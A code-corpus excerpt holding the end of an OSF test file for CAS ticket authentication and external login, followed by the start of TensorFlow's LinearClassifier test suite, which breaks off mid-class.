def test_make_response_from_ticket_invalidates_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_service_validate.return_value = make_successful_response(self.user)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_true(self.user.verification_key is None)
class TestCASExternalLogin(OsfTestCase):
def setUp(self):
super(TestCASExternalLogin, self).setUp()
self.user = UserFactory()
def test_get_user_from_cas_resp_already_authorized(self):
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
user, external_credential, action = cas.get_user_from_cas_resp(mock_response)
assert_equal(user._id, self.user._id)
assert_equal(external_credential, validated_creds)
assert_equal(action, 'authenticate')
def test_get_user_from_cas_resp_not_authorized(self):
user, external_credential, action = cas.get_user_from_cas_resp(make_external_response())
assert_equal(user, None)
assert_true(external_credential is not None)
assert_equal(action, 'external_first_login')
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_with_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_get_user_from_cas_resp.return_value = (self.user, validated_creds, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
assert_true(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_in('/logout?service=', resp.headers['Location'])
assert_in('/login?service=', resp.headers['Location'])
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_no_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
mock_get_user_from_cas_resp.return_value = (None, validated_creds, 'external_first_login')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
assert_true(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_equal(resp.location, '/external-login/email')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_generates_new_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
verification_key = self.user.verification_key
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_not_equal(self.user.verification_key, verification_key)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_unicode(self, mock_service_validate):
mock_response = make_external_response(unicode=True)
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_non_unicode(self, mock_service_validate):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
|
erinspace/osf.io
|
tests/test_cas_authentication.py
|
Python
|
apache-2.0
| 14,414
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for estimators.linear."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import tempfile
import numpy as np
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators import estimator_test_utils
from tensorflow.contrib.learn.python.learn.metric_spec import MetricSpec
def _prepare_iris_data_for_logistic_regression():
# Converts iris data to a logistic regression problem.
iris = tf.contrib.learn.datasets.load_iris()
ids = np.where((iris.target == 0) | (iris.target == 1))
iris = tf.contrib.learn.datasets.base.Dataset(data=iris.data[ids],
target=iris.target[ids])
return iris
def _iris_input_fn():
iris = tf.contrib.learn.datasets.load_iris()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[150, 1], dtype=tf.int32)
class LinearClassifierTest(tf.test.TestCase):
def testEstimatorContract(self):
estimator_test_utils.assert_estimator_contract(
self, tf.contrib.learn.LinearClassifier)
def testTrain(self):
"""Tests that loss goes down with training."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
classifier.fit(input_fn=input_fn, steps=200)
loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss2, loss1)
self.assertLess(loss2, 0.01)
def testJointTrain(self):
"""Tests that loss goes down with training with joint weights."""
def input_fn():
return {
'age': tf.SparseTensor(values=['1'], indices=[[0, 0]], shape=[1, 1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.sparse_column_with_hash_bucket('age', 2)
classifier = tf.contrib.learn.LinearClassifier(
_joint_weight=True,
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
loss1 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
classifier.fit(input_fn=input_fn, steps=200)
loss2 = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss2, loss1)
self.assertLess(loss2, 0.01)
def testMultiClass_MatrixData(self):
"""Tests multi-class classification using matrix data as input."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
def testMultiClass_MatrixData_Labels1D(self):
"""Same as the last test, but labels shape is [150] instead of [150, 1]."""
def _input_fn():
iris = tf.contrib.learn.datasets.load_iris()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[150], dtype=tf.int32)
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testMultiClass_NpMatrixData(self):
"""Tests multi-class classification using numpy matrix data as input."""
iris = tf.contrib.learn.datasets.load_iris()
train_x = iris.data
train_y = iris.target
feature_column = tf.contrib.layers.real_valued_column('', dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(x=train_x, y=train_y, steps=100)
scores = classifier.evaluate(x=train_x, y=train_y, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testLogisticRegression_MatrixData(self):
"""Tests binary classification using matrix data as input."""
def _input_fn():
iris = _prepare_iris_data_for_logistic_regression()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[100, 1], dtype=tf.int32)
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[feature_column])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testLogisticRegression_MatrixData_Labels1D(self):
"""Same as the last test, but labels shape is [100] instead of [100, 1]."""
def _input_fn():
iris = _prepare_iris_data_for_logistic_regression()
return {
'feature': tf.constant(iris.data, dtype=tf.float32)
}, tf.constant(iris.target, shape=[100], dtype=tf.int32)
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[feature_column])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testLogisticRegression_NpMatrixData(self):
"""Tests binary classification using numpy matrix data as input."""
iris = _prepare_iris_data_for_logistic_regression()
train_x = iris.data
train_y = iris.target
feature_columns = [tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=feature_columns)
classifier.fit(x=train_x, y=train_y, steps=100)
scores = classifier.evaluate(x=train_x, y=train_y, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testWeightAndBiasNames(self):
"""Tests that weight and bias names haven't changed."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
self.assertEqual(4, len(classifier.weights_))
self.assertEqual(3, len(classifier.bias_))
def testCustomOptimizerByObject(self):
"""Tests multi-class classification using matrix data as input."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
optimizer=tf.train.FtrlOptimizer(learning_rate=0.1),
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
  def testCustomOptimizerByFunction(self):
    """Tests multi-class classification with the optimizer given as a callable."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
def _optimizer():
return tf.train.FtrlOptimizer(learning_rate=0.1)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
optimizer=_optimizer,
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
  def testCustomOptimizerByString(self):
    """Tests multi-class classification with the optimizer given by name."""
feature_column = tf.contrib.layers.real_valued_column('feature',
dimension=4)
classifier = tf.contrib.learn.LinearClassifier(
n_classes=3,
optimizer='Ftrl',
feature_columns=[feature_column])
classifier.fit(input_fn=_iris_input_fn, steps=100)
scores = classifier.evaluate(input_fn=_iris_input_fn, steps=100)
self.assertGreater(scores['accuracy'], 0.9)
def testCustomMetrics(self):
"""Tests custom evaluation metrics."""
def _input_fn(num_epochs=None):
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
labels = tf.constant([[1], [0], [0], [0]], dtype=tf.float32)
features = {'x': tf.train.limit_epochs(
tf.ones(shape=[4, 1], dtype=tf.float32), num_epochs=num_epochs)}
return features, labels
def _my_metric_op(predictions, labels):
# For the case of binary classification, the 2nd column of "predictions"
# denotes the model predictions.
predictions = tf.slice(predictions, [0, 1], [-1, 1])
return tf.reduce_sum(tf.mul(predictions, labels))
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[tf.contrib.layers.real_valued_column('x')])
classifier.fit(input_fn=_input_fn, steps=100)
scores = classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={
'my_accuracy': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_accuracy,
prediction_key='classes'),
'my_precision': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_precision,
prediction_key='classes'),
'my_metric': MetricSpec(metric_fn=_my_metric_op,
prediction_key='probabilities')
})
self.assertTrue(
set(['loss', 'my_accuracy', 'my_precision', 'my_metric'
]).issubset(set(scores.keys())))
predict_input_fn = functools.partial(_input_fn, num_epochs=1)
predictions = np.array(list(classifier.predict(input_fn=predict_input_fn)))
self.assertEqual(_sklearn.accuracy_score([1, 0, 0, 0], predictions),
scores['my_accuracy'])
# Tests the case where the prediction_key is neither "classes" nor
# "probabilities".
with self.assertRaisesRegexp(KeyError, 'bad_type'):
classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={
'bad_name': MetricSpec(
metric_fn=tf.contrib.metrics.streaming_auc,
prediction_key='bad_type')})
# Tests the case where the 2nd element of the key is neither "classes" nor
# "probabilities".
with self.assertRaises(KeyError):
classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={('bad_name', 'bad_type'): tf.contrib.metrics.streaming_auc})
# Tests the case where the tuple of the key doesn't have 2 elements.
with self.assertRaises(ValueError):
classifier.evaluate(
input_fn=_input_fn,
steps=100,
metrics={
('bad_length_name', 'classes', 'bad_length'):
tf.contrib.metrics.streaming_accuracy
})
def testLogisticFractionalLabels(self):
"""Tests logistic training with fractional labels."""
def input_fn(num_epochs=None):
return {
'age': tf.train.limit_epochs(
tf.constant([[1], [2]]), num_epochs=num_epochs),
}, tf.constant([[.7], [0]], dtype=tf.float32)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age],
config=tf.contrib.learn.RunConfig(tf_random_seed=1))
classifier.fit(input_fn=input_fn, steps=500)
predict_input_fn = functools.partial(input_fn, num_epochs=1)
predictions_proba = list(
classifier.predict_proba(input_fn=predict_input_fn))
# Prediction probabilities mirror the labels column, which proves that the
# classifier learns from float input.
self.assertAllClose([[.3, .7], [1., 0.]], predictions_proba, atol=.1)
def testTrainWithPartitionedVariables(self):
"""Tests training with partitioned variables."""
def _input_fn():
features = {
'language': tf.SparseTensor(values=['en', 'fr', 'zh'],
indices=[[0, 0], [0, 1], [2, 0]],
shape=[3, 2])
}
labels = tf.constant([[1], [0], [0]])
return features, labels
sparse_features = [
# The given hash_bucket_size results in variables larger than the
# default min_slice_size attribute, so the variables are partitioned.
tf.contrib.layers.sparse_column_with_hash_bucket('language',
hash_bucket_size=2e7)
]
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=sparse_features,
# Because we did not start a distributed cluster, we need to pass an
# empty ClusterSpec, otherwise the device_setter will look for
# distributed jobs, such as "/job:ps" which are not present.
config=tf.contrib.learn.RunConfig(
num_ps_replicas=2, cluster_spec=tf.train.ClusterSpec({})))
classifier.fit(input_fn=_input_fn, steps=200)
loss = classifier.evaluate(input_fn=_input_fn, steps=1)['loss']
self.assertLess(loss, 0.07)
def testTrainSaveLoad(self):
"""Tests that insures you can save and reload a trained model."""
def input_fn(num_epochs=None):
return {
'age': tf.train.limit_epochs(tf.constant([1]), num_epochs=num_epochs),
'language': tf.SparseTensor(
values=['english'], indices=[[0, 0]], shape=[1, 1]),
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
model_dir = tempfile.mkdtemp()
classifier = tf.contrib.learn.LinearClassifier(
model_dir=model_dir,
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=30)
predict_input_fn = functools.partial(input_fn, num_epochs=1)
out1_class = list(classifier.predict(input_fn=predict_input_fn,
as_iterable=True))
out1_proba = list(classifier.predict_proba(input_fn=predict_input_fn,
as_iterable=True))
del classifier
classifier2 = tf.contrib.learn.LinearClassifier(
model_dir=model_dir,
feature_columns=[age, language])
out2_class = list(classifier2.predict(input_fn=predict_input_fn,
as_iterable=True))
out2_proba = list(classifier2.predict_proba(input_fn=predict_input_fn,
as_iterable=True))
self.assertTrue(np.array_equal(out1_class, out2_class))
self.assertTrue(np.array_equal(out1_proba, out2_proba))
def testWeightColumn(self):
"""Tests training with given weight column."""
def _input_fn_train():
# Create 4 rows, one of them (y = x), three of them (y=Not(x))
      # First row has more weight than others. Model should fit (y=x) better
      # than (y=Not(x)) due to the relatively higher weight of the first row.
labels = tf.constant([[1], [0], [0], [0]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[100.], [3.], [2.], [2.]])
}
return features, labels
def _input_fn_eval():
# Create 4 rows (y = x)
labels = tf.constant([[1], [1], [1], [1]])
features = {
'x': tf.ones(shape=[4, 1], dtype=tf.float32),
'w': tf.constant([[1.], [1.], [1.], [1.]])
}
return features, labels
classifier = tf.contrib.learn.LinearClassifier(
weight_column_name='w',
feature_columns=[tf.contrib.layers.real_valued_column('x')],
config=tf.contrib.learn.RunConfig(tf_random_seed=3))
classifier.fit(input_fn=_input_fn_train, steps=100)
scores = classifier.evaluate(input_fn=_input_fn_eval, steps=1)
# All examples in eval data set are y=x.
self.assertGreater(scores['labels/actual_label_mean'], 0.9)
# If there were no weight column, model would learn y=Not(x). Because of
# weights, it learns y=x.
self.assertGreater(scores['labels/prediction_mean'], 0.9)
# All examples in eval data set are y=x. So if weight column were ignored,
# then accuracy would be zero. Because of weights, accuracy should be close
# to 1.0.
self.assertGreater(scores['accuracy'], 0.9)
scores_train_set = classifier.evaluate(input_fn=_input_fn_train, steps=1)
# Considering weights, the mean label should be close to 1.0.
# If weights were ignored, it would be 0.25.
self.assertGreater(scores_train_set['labels/actual_label_mean'], 0.9)
# The classifier has learned y=x. If weight column were ignored in
# evaluation, then accuracy for the train set would be 0.25.
# Because weight is not ignored, accuracy is greater than 0.6.
self.assertGreater(scores_train_set['accuracy'], 0.6)
def testWeightColumnLoss(self):
"""Test ensures that you can specify per-example weights for loss."""
def _input_fn():
features = {
'age': tf.constant([[20], [20], [20]]),
'weights': tf.constant([[100], [1], [1]]),
}
labels = tf.constant([[1], [0], [0]])
return features, labels
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age])
classifier.fit(input_fn=_input_fn, steps=100)
loss_unweighted = classifier.evaluate(input_fn=_input_fn, steps=1)['loss']
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age],
weight_column_name='weights')
classifier.fit(input_fn=_input_fn, steps=100)
loss_weighted = classifier.evaluate(input_fn=_input_fn, steps=1)['loss']
self.assertLess(loss_weighted, loss_unweighted)
def testExport(self):
"""Tests that export model for servo works."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language])
classifier.fit(input_fn=input_fn, steps=100)
export_dir = tempfile.mkdtemp()
classifier.export(export_dir)
def testDisableCenteredBias(self):
"""Tests that we can disable centered bias."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language], enable_centered_bias=False)
classifier.fit(input_fn=input_fn, steps=100)
self.assertFalse('centered_bias_weight' in classifier.get_variable_names())
def testEnableCenteredBias(self):
"""Tests that we can disable centered bias."""
def input_fn():
return {
'age': tf.constant([1]),
'language': tf.SparseTensor(values=['english'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language], enable_centered_bias=True)
classifier.fit(input_fn=input_fn, steps=100)
self.assertTrue('centered_bias_weight' in classifier.get_variable_names())
def testTrainOptimizerWithL1Reg(self):
"""Tests l1 regularized model has higher loss."""
def input_fn():
return {
'language': tf.SparseTensor(values=['hindi'],
indices=[[0, 0]],
shape=[1, 1])
}, tf.constant([[1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
classifier_no_reg = tf.contrib.learn.LinearClassifier(
feature_columns=[language])
classifier_with_reg = tf.contrib.learn.LinearClassifier(
feature_columns=[language],
optimizer=tf.train.FtrlOptimizer(learning_rate=1.0,
l1_regularization_strength=100.))
loss_no_reg = classifier_no_reg.fit(
input_fn=input_fn, steps=100).evaluate(
input_fn=input_fn, steps=1)['loss']
loss_with_reg = classifier_with_reg.fit(
input_fn=input_fn, steps=100).evaluate(
input_fn=input_fn, steps=1)['loss']
self.assertLess(loss_no_reg, loss_with_reg)
def testTrainWithMissingFeature(self):
"""Tests that training works with missing features."""
def input_fn():
return {
'language': tf.SparseTensor(values=['Swahili', 'turkish'],
indices=[[0, 0], [2, 0]],
shape=[3, 1])
}, tf.constant([[1], [1], [1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
classifier = tf.contrib.learn.LinearClassifier(feature_columns=[language])
classifier.fit(input_fn=input_fn, steps=100)
loss = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.07)
def testSdcaOptimizerRealValuedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and real valued features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2']),
'maintenance_cost': tf.constant([[500.0], [200.0]]),
'sq_footage': tf.constant([[800.0], [600.0]]),
'weights': tf.constant([[1.0], [1.0]])
}, tf.constant([[0], [1]])
maintenance_cost = tf.contrib.layers.real_valued_column('maintenance_cost')
sq_footage = tf.contrib.layers.real_valued_column('sq_footage')
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[maintenance_cost, sq_footage],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=100)
loss = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.05)
def testSdcaOptimizerRealValuedFeatureWithHigherDimension(self):
"""Tests SDCAOptimizer with real valued features of higher dimension."""
# input_fn is identical to the one in testSdcaOptimizerRealValuedFeatures
# where 2 1-dimensional dense features have been replaced by 1 2-dimensional
# feature.
def input_fn():
return {
'example_id': tf.constant(['1', '2']),
'dense_feature': tf.constant([[500.0, 800.0], [200.0, 600.0]])
}, tf.constant([[0], [1]])
dense_feature = tf.contrib.layers.real_valued_column(
'dense_feature', dimension=2)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[dense_feature], optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=100)
loss = classifier.evaluate(input_fn=input_fn, steps=1)['loss']
self.assertLess(loss, 0.05)
def testSdcaOptimizerBucketizedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and bucketized features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[600.0], [1000.0], [400.0]]),
'sq_footage': tf.constant([[1000.0], [600.0], [700.0]]),
'weights': tf.constant([[1.0], [1.0], [1.0]])
}, tf.constant([[1], [0], [1]])
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('price'),
boundaries=[500.0, 700.0])
sq_footage_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('sq_footage'),
boundaries=[650.0])
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id',
symmetric_l2_regularization=1.0)
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[price_bucket, sq_footage_bucket],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerSparseFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and sparse features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.4], [0.6], [0.3]]),
'country': tf.SparseTensor(values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[1.0], [1.0], [1.0]])
}, tf.constant([[1], [0], [1]])
price = tf.contrib.layers.real_valued_column('price')
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[price, country],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerWeightedSparseFeatures(self):
"""LinearClasssifier with SDCAOptimizer and weighted sparse features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.SparseTensor(values=[2., 3., 1.],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 5]),
'country': tf.SparseTensor(values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 5])
}, tf.constant([[1], [0], [1]])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
country_weighted_by_price = tf.contrib.layers.weighted_sparse_column(
country, 'price')
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[country_weighted_by_price],
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerCrossedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and crossed features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'language': tf.SparseTensor(values=['english', 'italian', 'spanish'],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1]),
'country': tf.SparseTensor(values=['US', 'IT', 'MX'],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}, tf.constant([[0], [0], [1]])
language = tf.contrib.layers.sparse_column_with_hash_bucket(
'language', hash_bucket_size=5)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[country_language],
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=10)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testSdcaOptimizerMixedFeatures(self):
"""Tests LinearClasssifier with SDCAOptimizer and a mix of features."""
def input_fn():
return {
'example_id': tf.constant(['1', '2', '3']),
'price': tf.constant([[0.6], [0.8], [0.3]]),
'sq_footage': tf.constant([[900.0], [700.0], [600.0]]),
'country': tf.SparseTensor(values=['IT', 'US', 'GB'],
indices=[[0, 0], [1, 3], [2, 1]],
shape=[3, 5]),
'weights': tf.constant([[3.0], [1.0], [1.0]])
}, tf.constant([[1], [0], [1]])
price = tf.contrib.layers.real_valued_column('price')
sq_footage_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column('sq_footage'),
boundaries=[650.0, 800.0])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
'country', hash_bucket_size=5)
sq_footage_country = tf.contrib.layers.crossed_column(
[sq_footage_bucket, country],
hash_bucket_size=10)
sdca_optimizer = tf.contrib.linear_optimizer.SDCAOptimizer(
example_id_column='example_id')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[price, sq_footage_bucket, country, sq_footage_country],
weight_column_name='weights',
optimizer=sdca_optimizer)
classifier.fit(input_fn=input_fn, steps=50)
scores = classifier.evaluate(input_fn=input_fn, steps=1)
self.assertGreater(scores['accuracy'], 0.9)
def testEval(self):
"""Tests that eval produces correct metrics.
"""
def input_fn():
return {
'age': tf.constant([[1], [2]]),
'language': tf.SparseTensor(values=['greek', 'chinese'],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}, tf.constant([[1], [0]])
language = tf.contrib.layers.sparse_column_with_hash_bucket('language', 100)
age = tf.contrib.layers.real_valued_column('age')
classifier = tf.contrib.learn.LinearClassifier(
feature_columns=[age, language])
# Evaluate on trained model
classifier.fit(input_fn=input_fn, steps=100)
classifier.evaluate(input_fn=input_fn, steps=1)
# TODO(ispir): Enable accuracy check after resolving the randomness issue.
# self.assertLess(evaluated_values['loss/mean'], 0.3)
# self.assertGreater(evaluated_values['accuracy/mean'], .95)
class LinearRegressorTest(tf.test.TestCase):
def testEstimatorContract(self):
estimator_test_utils.assert_estimator_contract(
